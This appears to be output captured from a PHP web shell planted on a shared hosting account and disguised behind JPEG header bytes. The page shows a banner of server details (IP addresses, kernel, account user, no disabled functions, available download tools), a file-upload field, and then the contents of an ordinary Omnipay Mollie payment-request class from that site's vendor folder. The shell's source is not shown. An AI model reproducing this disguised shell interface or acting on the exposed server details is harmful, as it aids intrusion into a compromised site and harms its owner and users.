����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.149.10.88 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/vendor/omnipay/mollie/src/Message/Request/ |
Upload File : |
<?php namespace Omnipay\Mollie\Message\Request; use Omnipay\Common\Exception\InvalidRequestException; use Omnipay\Common\Message\ResponseInterface; use Omnipay\Mollie\Message\Response\PurchaseResponse; /** * Create a payment with the Mollie API. * * @see https://docs.mollie.com/reference/v2/payments-api/create-payment * @method PurchaseResponse send() */ class PurchaseRequest extends AbstractMollieRequest { /** * @return array */ public function getMetadata() { return $this->getParameter('metadata'); } /** * @param array $value * @return $this */ public function setMetadata(array $value) { return $this->setParameter('metadata', $value); } /** * @return string */ public function getLocale() { return $this->getParameter('locale'); } /** * @param string $value * @return $this */ public function setLocale($value) { return $this->setParameter('locale', $value); } /** * @return string */ public function getBillingEmail() { return $this->getParameter('billingEmail'); } /** * @param string $value * @return $this */ public function setBillingEmail($value) { return $this->setParameter('billingEmail', $value); } /** * @return string */ public function getCustomerReference() { return $this->getParameter('customerReference'); } /** * @param string $value * @return $this */ public function setCustomerReference($value) { return $this->setParameter('customerReference', $value); } /** * @return string */ public function getMandateId() { return $this->getParameter('mandateId'); } /** * @param string $value * @return $this */ public function setMandateId($value) { return $this->setParameter('mandateId', $value); } /** * @return string */ public function getSequenceType() { return $this->getParameter('sequenceType'); } /** * @param string $value * @return $this */ public function setSequenceType($value) { return $this->setParameter('sequenceType', $value); } /** * @return string */ public function getCardToken() { return $this->getParameter('cardToken'); } /** * @param string $value * @return $this */ public function setCardToken($value) { return $this->setParameter('cardToken', $value); } /** * @return string */ public function getInclude() { return $this->getParameter('include'); } /** * @param string $value * @return $this */ public function setInclude($value) { return $this->setParameter('include', $value); } /** * @return array * @throws InvalidRequestException */ public function getData() { $this->validate('apiKey', 'amount', 'currency', 'description', 'returnUrl'); $data = []; $data['amount'] = [ "value" => $this->getAmount(), "currency" => $this->getCurrency() ]; $data['description'] = $this->getDescription(); $data['redirectUrl'] = $this->getReturnUrl(); $data['method'] = $this->getPaymentMethod(); $data['metadata'] = $this->getMetadata(); if ($this->getTransactionId()) { $data['metadata']['transactionId'] = $this->getTransactionId(); } if ($issuer = $this->getIssuer()) { $data['issuer'] = $issuer; } $webhookUrl = $this->getNotifyUrl(); if (null !== $webhookUrl) { $data['webhookUrl'] = $webhookUrl; } if ($locale = $this->getLocale()) { $data['locale'] = $locale; } if ($billingEmail = $this->getBillingEmail()) { $data['billingEmail'] = $billingEmail; } if ($customerReference = $this->getCustomerReference()) { $data['customerId'] = $customerReference; } if ($sequenceType = $this->getSequenceType()) { $data['sequenceType'] = $sequenceType; } if ($mandateId = $this->getMandateId()) { $data['mandateId'] = $mandateId; } if ($cardToken = $this->getCardToken()) { $data['cardToken'] = $cardToken; } return $data; } /** * @param array $data * @return ResponseInterface|PurchaseResponse */ public function sendData($data) { $endpoint = '/payments'; if ($include = $this->getInclude()) { $endpoint .= '?include=' . $include; } $response = $this->sendRequest(self::POST, $endpoint, $data); return $this->response = new PurchaseResponse($this, $response); } }